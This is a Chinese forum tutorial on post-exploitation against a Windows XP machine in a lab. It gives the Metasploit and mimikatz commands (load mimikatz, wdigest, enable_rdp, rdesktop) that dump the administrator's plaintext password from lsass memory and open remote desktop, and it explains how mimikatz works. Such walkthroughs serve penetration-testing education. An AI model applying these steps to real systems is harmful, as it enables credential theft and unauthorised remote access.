搜索
查看: 4167|回复: 1

内网渗透测试之(密码破解)

    [复制链接]

651

主题

944

帖子

2425

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2425

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2019-1-12 17:39:16 | 显示全部楼层 |阅读模式

当我们获取系统的权限后,如果更高一步的获取权限呢,比如获取当前管理员的密码,开启远程桌面等。今天就让我们一起来看看吧。

PART 1/获取权限shell



如上,我们已经获取了系统的shell。当前受害系统为windows xp

PART 2/破解系统密码



载入mimikatz
  load mimikatz  




获取密码

 wdigest




如图,当前Administrator的密码为bbskali.cn

PART 3/开启远程桌面

 run post/windows/manage/enable_rdp


PART4/连接远程桌面

 rdesktop 192.168.1.109 -u user -p password




PART5/拓展

mimikatz介绍

mimikatz是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点也是让阿刚最感兴趣的就是他可以直接从 lsass中获取当前处于Active系统的登录密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而mimikatz正是通过对lsass的逆算获取到明文密码!也就是说只要你不重启电脑,就可以通过他获取到登陆密码,只限当前登陆系统!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复

使用道具 举报

651

主题

944

帖子

2425

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2425

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
 楼主| 发表于 2019-1-12 19:00:18 来自手机 | 显示全部楼层
mimikatz是一个不错的密码破解工具
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表